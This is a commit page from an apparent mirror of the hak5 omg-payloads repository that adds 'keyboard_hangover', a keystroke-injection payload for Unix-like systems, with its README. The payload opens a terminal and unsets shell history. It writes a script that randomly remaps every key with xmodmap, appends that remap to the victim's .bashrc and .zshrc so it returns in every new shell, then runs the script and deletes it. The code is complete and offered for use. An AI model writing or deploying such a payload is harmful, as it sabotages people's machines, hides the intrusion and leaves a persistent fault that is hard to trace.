hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

uploading keyboard_hangover payload 

keyboard_hangover is a powerful oneliner payload which randomly remaps target’s keyboard and and auto-triggers it.
pull/190/head
drapl0n 2023-07-09 19:54:02 +05:30 committed by GitHub
parent 3e231ab9b8
commit d1a5b3add2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 49 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
payloads/library/execution/keyboard_hangover/README.md Normal file
View File

@ -0,0 +1,27 @@
## About:
* Title: keyboard_hangover
* Description: keyboard_hangover is a powerful oneliner payload which randomly remaps target's keyboard.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Execution.
* Target: Unix-like operating systems.
* Attackmodes: HID.
## keyboard_hangover: keyboard_hangover is a powerful oneliner payload which randomly remaps target's keyboard and and auto-triggers it.
### Features:
1. Randomly remaps keyboard.
2. Auto-Triggers on shell execution.
3. Persistent payload.
4. Fast execution.
5. Oneliner.
### Workflow:
1. Prevent storing history.
2. Creating random string generation mechanism.
3. Creating loop to find files.
4. Granting executing privileges.
5. Executing Payload Script.
#### Support me if you like my work:
* https://twitter.com/drapl0n

22
payloads/library/execution/keyboard_hangover/payload.txt Normal file
View File

@ -0,0 +1,22 @@
REM Title: keyboard_hangover
REM Description: keyboard_hangover is a powerful payload which randomly remaps target's keyboard..
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Execution.
REM Target: Unix-like operating systems.
REM Attackmodes: HID
DELAY 1000
CTRL ALT t
DELAY 500
STRING unset HISTFILE
ENTER
DELAY 100
STRING echo -e "#\!/bin/bash\n\nmapping_file=\"/var/tmp/system\"\n\nkeycodes=(\$(seq 8 255))\ncharacters=(\$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 1 | head -n \${#keycodes[@]}))\n\nmapping_content=""\nfor((i=0; i<\${#keycodes[@]}; i++)); do\n\tkeycode=\${keycodes[i]}\n\tchar=\${characters[i]}\n\tmapping_content+=\"keycode \$keycode = \$char\\\n\"\ndone\n\necho -e \$mapping_content > \$mapping_file\n\nls -a ~/ | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"xmodmap /var/tmp/system\" >> ~/.zshrc\nfi\nls -a ~/ | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"xmodmap /var/tmp/system\" >> ~/.bashrc\nfi" > /tmp/sys
ENTER
DELAY 200
STRING chmod +x /tmp/sys
ENTER
DELAY 200
STRING /tmp/./sys && rm /tmp/sys && exit
ENTER